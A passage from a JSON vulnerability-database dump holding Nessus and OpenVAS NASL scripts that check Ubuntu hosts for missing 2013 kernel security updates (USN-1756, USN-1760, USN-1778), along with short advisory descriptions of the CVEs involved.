audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-0268\", \"CVE-2013-0309\", \"CVE-2013-1773\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-1776-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-351-ec2\", pkgver:\"2.6.32-351.62\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-2.6-ec2\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:38:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0228", "CVE-2013-0268", "CVE-2013-0217", "CVE-2013-0349", "CVE-2013-0311", "CVE-2013-1773", "CVE-2013-0216"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-03-15T00:00:00", "id": "OPENVAS:1361412562310841359", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841359", "type": "openvas", "title": "Ubuntu Update for linux-lts-backport-oneiric USN-1760-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1760_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux-lts-backport-oneiric USN-1760-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1760-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841359\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-15 10:05:24 +0530 (Fri, 15 Mar 2013)\");\n script_cve_id(\"CVE-2013-0216\", \"CVE-2013-0217\", \"CVE-2013-0228\", \"CVE-2013-0268\",\n \"CVE-2013-0311\", \"CVE-2013-0349\", \"CVE-2013-1773\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:H/Au:S/C:C/I:C/A:C\");\n script_xref(name:\"USN\", value:\"1760-1\");\n script_name(\"Ubuntu Update for linux-lts-backport-oneiric USN-1760-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-backport-oneiric'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU10\\.04 LTS\");\n script_tag(name:\"affected\", value:\"linux-lts-backport-oneiric on Ubuntu 10.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"A failure to validate input was discovered in the Linux kernel's Xen\n netback (network backend) driver. A user in a guest OS may exploit this\n flaw to cause a denial of service to the guest OS and other guest domains.\n (CVE-2013-0216)\n\n A memory leak was discovered in the Linux kernel's Xen netback (network\n backend) driver. A user in a guest OS could trigger this flaw to cause a\n denial of service on the system. (CVE-2013-0217)\n\n Andrew Jones discovered a flaw with the xen_iret function in Linux kernel's\n Xen virtualizeation. In the 32-bit Xen paravirt platform an unprivileged\n guest OS user could exploit this flaw to cause a denial of service (crash\n the system) or gain guest OS privilege. (CVE-2013-0228)\n\n A flaw was reported in the permission checks done by the Linux kernel for\n /dev/cpu/*/msr. A local root user with all capabilities dropped could\n exploit this flaw to execute code with full root capabilities.\n (CVE-2013-0268)\n\n A flaw was discovered in the Linux kernel's vhost driver used to accelerate\n guest networking in KVM based virtual machines. A privileged guest user\n could exploit this flaw to crash the host system. (CVE-2013-0311)\n\n An information leak was discovered in the Linux kernel's Bluetooth stack\n when HIDP (Human Interface Device Protocol) support is enabled. A local\n unprivileged user could exploit this flaw to cause an information leak from\n the kernel. (CVE-2013-0349)\n\n A flaw was discovered on the Linux kernel's VFAT filesystem driver when a\n disk is mounted with the utf8 option (this is the default on Ubuntu). On a\n system where disks/images can be auto-mounted or a FAT filesystem is\n mounted an unprivileged user can exploit the flaw to gain root privileges.\n (CVE-2013-1773)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-32-generic\", ver:\"3.0.0-32.50~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-32-generic-pae\", ver:\"3.0.0-32.50~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-32-server\", ver:\"3.0.0-32.50~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-32-virtual\", ver:\"3.0.0-32.50~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:A/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2018-01-26T11:09:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0228", "CVE-2013-0268", "CVE-2013-0217", "CVE-2013-0349", "CVE-2013-0311", "CVE-2013-1773", "CVE-2013-0216"], "description": "Check for the Version of linux", "modified": "2018-01-25T00:00:00", "published": "2013-03-08T00:00:00", "id": "OPENVAS:841351", "href": "http://plugins.openvas.org/nasl.php?oid=841351", "type": "openvas", "title": "Ubuntu Update for linux USN-1756-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1756_1.nasl 8526 2018-01-25 06:57:37Z teissa $\n#\n# Ubuntu Update for linux USN-1756-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A failure to validate input was discovered in the Linux kernel's Xen\n netback (network backend) driver. A user in a guest OS may exploit this\n flaw to cause a denial of service to the guest OS and other guest domains.\n (CVE-2013-0216)\n\n A memory leak was discovered in the Linux kernel's Xen netback (network\n backend) driver. A user in a guest OS could trigger this flaw to cause a\n denial of service on the system. (CVE-2013-0217)\n\n Andrew Jones discovered a flaw with the xen_iret function in Linux kernel's\n Xen virtualizeation. In the 32-bit Xen paravirt platform an unprivileged\n guest OS user could exploit this flaw to cause a denial of service (crash\n the system) or gain guest OS privilege. (CVE-2013-0228)\n\n A flaw was reported in the permission checks done by the Linux kernel for\n /dev/cpu/*/msr. A local root user with all capabilities dropped could\n exploit this flaw to execute code with full root capabilities.\n (CVE-2013-0268)\n\n A flaw was discovered in the Linux kernel's vhost driver used to accelerate\n guest networking in KVM based virtual machines. A privileged guest user\n could exploit this flaw to crash the host system. (CVE-2013-0311)\n\n An information leak was discovered in the Linux kernel's Bluetooth stack\n when HIDP (Human Interface Device Protocol) support is enabled. A local\n unprivileged user could exploit this flaw to cause an information leak from\n the kernel. (CVE-2013-0349)\n\n A flaw was discovered on the Linux kernel's VFAT filesystem driver when a\n disk is mounted with the utf8 option (this is the default on Ubuntu). On a\n system where disks/images can be auto-mounted or a FAT filesystem is\n mounted an unprivileged user can exploit the flaw to gain root privileges.\n (CVE-2013-1773)\";\n\n\ntag_affected = \"linux on Ubuntu 11.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1756-1/\");\n script_id(841351);\n script_version(\"$Revision: 8526 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-25 07:57:37 +0100 (Thu, 25 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-08 10:22:33 +0530 (Fri, 08 Mar 2013)\");\n script_cve_id(\"CVE-2013-0216\", \"CVE-2013-0217\", \"CVE-2013-0228\", \"CVE-2013-0268\",\n \"CVE-2013-0311\", \"CVE-2013-0349\", \"CVE-2013-1773\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:H/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1756-1\");\n script_name(\"Ubuntu Update for linux USN-1756-1\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of linux\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-32-generic\", ver:\"3.0.0-32.50\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-32-generic-pae\", ver:\"3.0.0-32.50\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-32-omap\", ver:\"3.0.0-32.50\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-32-powerpc\", ver:\"3.0.0-32.50\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-32-powerpc-smp\", ver:\"3.0.0-32.50\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-32-powerpc64-smp\", ver:\"3.0.0-32.50\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-32-server\", ver:\"3.0.0-32.50\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-32-virtual\", ver:\"3.0.0-32.50\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:ADJACENT_NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0228", "CVE-2013-0268", "CVE-2013-0217", "CVE-2013-0349", "CVE-2013-0311", "CVE-2013-1773", "CVE-2013-0216"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-03-08T00:00:00", "id": "OPENVAS:1361412562310841351", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841351", "type": "openvas", "title": "Ubuntu Update for linux USN-1756-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1756_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux USN-1756-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1756-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841351\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-08 10:22:33 +0530 (Fri, 08 Mar 2013)\");\n script_cve_id(\"CVE-2013-0216\", \"CVE-2013-0217\", \"CVE-2013-0228\", \"CVE-2013-0268\",\n \"CVE-2013-0311\", \"CVE-2013-0349\", \"CVE-2013-1773\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:H/Au:S/C:C/I:C/A:C\");\n script_xref(name:\"USN\", value:\"1756-1\");\n script_name(\"Ubuntu Update for linux USN-1756-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU11\\.10\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 11.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"A failure to validate input was discovered in the Linux kernel's Xen\n netback (network backend) driver. A user in a guest OS may exploit this\n flaw to cause a denial of service to the guest OS and other guest domains.\n (CVE-2013-0216)\n\n A memory leak was discovered in the Linux kernel's Xen netback (network\n backend) driver. A user in a guest OS could trigger this flaw to cause a\n denial of service on the system. (CVE-2013-0217)\n\n Andrew Jones discovered a flaw with the xen_iret function in Linux kernel's\n Xen virtualizeation. In the 32-bit Xen paravirt platform an unprivileged\n guest OS user could exploit this flaw to cause a denial of service (crash\n the system) or gain guest OS privilege. (CVE-2013-0228)\n\n A flaw was reported in the permission checks done by the Linux kernel for\n /dev/cpu/*/msr. A local root user with all capabilities dropped could\n exploit this flaw to execute code with full root capabilities.\n (CVE-2013-0268)\n\n A flaw was discovered in the Linux kernel's vhost driver used to accelerate\n guest networking in KVM based virtual machines. A privileged guest user\n could exploit this flaw to crash the host system. (CVE-2013-0311)\n\n An information leak was discovered in the Linux kernel's Bluetooth stack\n when HIDP (Human Interface Device Protocol) support is enabled. A local\n unprivileged user could exploit this flaw to cause an information leak from\n the kernel. (CVE-2013-0349)\n\n A flaw was discovered on the Linux kernel's VFAT filesystem driver when a\n disk is mounted with the utf8 option (this is the default on Ubuntu). On a\n system where disks/images can be auto-mounted or a FAT filesystem is\n mounted an unprivileged user can exploit the flaw to gain root privileges.\n (CVE-2013-1773)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-32-generic\", ver:\"3.0.0-32.50\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-32-generic-pae\", ver:\"3.0.0-32.50\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-32-omap\", ver:\"3.0.0-32.50\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-32-powerpc\", ver:\"3.0.0-32.50\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-32-powerpc-smp\", ver:\"3.0.0-32.50\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-32-powerpc64-smp\", ver:\"3.0.0-32.50\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-32-server\", ver:\"3.0.0-32.50\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-32-virtual\", ver:\"3.0.0-32.50\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:A/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2018-01-23T13:10:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0228", "CVE-2013-0268", "CVE-2013-0217", "CVE-2013-0349", "CVE-2013-0311", "CVE-2013-1773", "CVE-2013-0216"], "description": "Check for the Version of linux-lts-backport-oneiric", "modified": "2018-01-23T00:00:00", "published": "2013-03-15T00:00:00", "id": "OPENVAS:841359", "href": "http://plugins.openvas.org/nasl.php?oid=841359", "type": "openvas", "title": "Ubuntu Update for linux-lts-backport-oneiric USN-1760-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1760_1.nasl 8494 2018-01-23 06:57:55Z teissa $\n#\n# Ubuntu Update for linux-lts-backport-oneiric USN-1760-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A failure to validate input was discovered in the Linux kernel's Xen\n netback (network backend) driver. A user in a guest OS may exploit this\n flaw to cause a denial of service to the guest OS and other guest domains.\n (CVE-2013-0216)\n\n A memory leak was discovered in the Linux kernel's Xen netback (network\n backend) driver. A user in a guest OS could trigger this flaw to cause a\n denial of service on the system. (CVE-2013-0217)\n \n Andrew Jones discovered a flaw with the xen_iret function in Linux kernel's\n Xen virtualizeation. In the 32-bit Xen paravirt platform an unprivileged\n guest OS user could exploit this flaw to cause a denial of service (crash\n the system) or gain guest OS privilege. (CVE-2013-0228)\n \n A flaw was reported in the permission checks done by the Linux kernel for\n /dev/cpu/*/msr. A local root user with all capabilities dropped could\n exploit this flaw to execute code with full root capabilities.\n (CVE-2013-0268)\n \n A flaw was discovered in the Linux kernel's vhost driver used to accelerate\n guest networking in KVM based virtual machines. A privileged guest user\n could exploit this flaw to crash the host system. (CVE-2013-0311)\n \n An information leak was discovered in the Linux kernel's Bluetooth stack\n when HIDP (Human Interface Device Protocol) support is enabled. A local\n unprivileged user could exploit this flaw to cause an information leak from\n the kernel. (CVE-2013-0349)\n \n A flaw was discovered on the Linux kernel's VFAT filesystem driver when a\n disk is mounted with the utf8 option (this is the default on Ubuntu). On a\n system where disks/images can be auto-mounted or a FAT filesystem is\n mounted an unprivileged user can exploit the flaw to gain root privileges.\n (CVE-2013-1773)\";\n\n\ntag_affected = \"linux-lts-backport-oneiric on Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1760-1/\");\n script_id(841359);\n script_version(\"$Revision: 8494 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 07:57:55 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-15 10:05:24 +0530 (Fri, 15 Mar 2013)\");\n script_cve_id(\"CVE-2013-0216\", \"CVE-2013-0217\", \"CVE-2013-0228\", \"CVE-2013-0268\",\n \"CVE-2013-0311\", \"CVE-2013-0349\", \"CVE-2013-1773\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:H/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1760-1\");\n script_name(\"Ubuntu Update for linux-lts-backport-oneiric USN-1760-1\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of linux-lts-backport-oneiric\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-32-generic\", ver:\"3.0.0-32.50~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-32-generic-pae\", ver:\"3.0.0-32.50~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-32-server\", ver:\"3.0.0-32.50~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-32-virtual\", ver:\"3.0.0-32.50~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:ADJACENT_NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:21:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0228", "CVE-2013-0268", "CVE-2013-0349", "CVE-2013-0311", "CVE-2013-1773"], "description": "Check for the Version of linux-ti-omap4", "modified": "2017-12-01T00:00:00", "published": "2013-03-25T00:00:00", "id": "OPENVAS:841374", "href": "http://plugins.openvas.org/nasl.php?oid=841374", "type": "openvas", "title": "Ubuntu Update for linux-ti-omap4 USN-1778-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1778_1.nasl 7958 2017-12-01 06:47:47Z santu $\n#\n# Ubuntu Update for linux-ti-omap4 USN-1778-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Andrew Jones discovered a flaw with the xen_iret function in Linux kernel's\n Xen virtualizeation. In the 32-bit Xen paravirt platform an unprivileged\n guest OS user could exploit this flaw to cause a denial of service (crash\n the system) or gain guest OS privilege. (CVE-2013-0228)\n\n A flaw was reported in the permission checks done by the Linux kernel for\n /dev/cpu/*/msr. A local root user with all capabilities dropped could\n exploit this flaw to execute code with full root capabilities.\n (CVE-2013-0268)\n\n A flaw was discovered in the Linux kernel's vhost driver used to accelerate\n guest networking in KVM based virtual machines. A privileged guest user\n could exploit this flaw to crash the host system. (CVE-2013-0311)\n\n An information leak was discovered in the Linux kernel's Bluetooth stack\n when HIDP (Human Interface Device Protocol) support is enabled. A local\n unprivileged user could exploit this flaw to cause an information leak from\n the kernel. (CVE-2013-0349)\n\n A flaw was discovered on the Linux kernel's VFAT filesystem driver when a\n disk is mounted with the utf8 option (this is the default on Ubuntu). On a\n system where disks/images can be auto-mounted or a FAT filesystem is\n mounted an unprivileged user can exploit the flaw to gain root privileges.\n (CVE-2013-1773)\";\n\n\ntag_affected = \"linux-ti-omap4 on Ubuntu 11.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1778-1/\");\n script_id(841374);\n script_version(\"$Revision: 7958 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:47:47 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-25 11:04:04 +0530 (Mon, 25 Mar 2013)\");\n script_cve_id(\"CVE-2013-0228\", \"CVE-2013-0268\", \"CVE-2013-0311\", \"CVE-2013-0349\",\n \"CVE-2013-1773\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:H/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1778-1\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-1778-1\");\n\n script_summary(\"Check for the Version of linux-ti-omap4\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 